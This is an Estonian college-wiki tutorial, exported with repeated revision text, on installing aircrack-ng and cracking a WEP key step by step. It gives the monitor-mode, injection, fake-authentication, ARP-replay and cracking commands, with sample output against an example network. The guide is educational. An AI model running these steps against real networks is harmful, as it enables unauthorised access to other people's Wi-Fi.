* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89301</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89301"/>
		<updated>2015-05-25T19:26:43Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Näide WEP võtme lahti murdmise protsessist */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
